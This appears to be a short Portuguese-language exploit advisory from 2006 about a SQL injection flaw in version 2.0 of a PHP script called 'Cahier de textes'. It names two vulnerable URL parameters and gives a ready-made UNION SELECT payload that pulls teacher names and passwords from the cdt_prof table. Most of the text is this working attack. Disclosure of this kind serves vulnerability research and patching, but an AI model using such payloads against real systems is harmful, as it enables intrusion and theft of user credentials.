|
07 de outubro de 2006 |
|
Nome do Script: Cahier de textes
Site do script: -
Versão Afetada: 2.0
Encontrado por s4mi
Email: s4mi[at]linuxmail[dot]org
Exploração:
http://localhost/PATH/lire.php?classe_ID=1&matiere_ID=[SQL]
Ou
http://localhost/PATH/lire_a_faire.php?classe_ID=[SQL]
Exemplo:
http://localhost/PATH/lire.php?classe_ID=1&matiere_ID=-1+union%20select%201,CONCAT(nom_prof,CHAR(58),CHAR(58),passe)%20FROM%20cdt_prof/*
|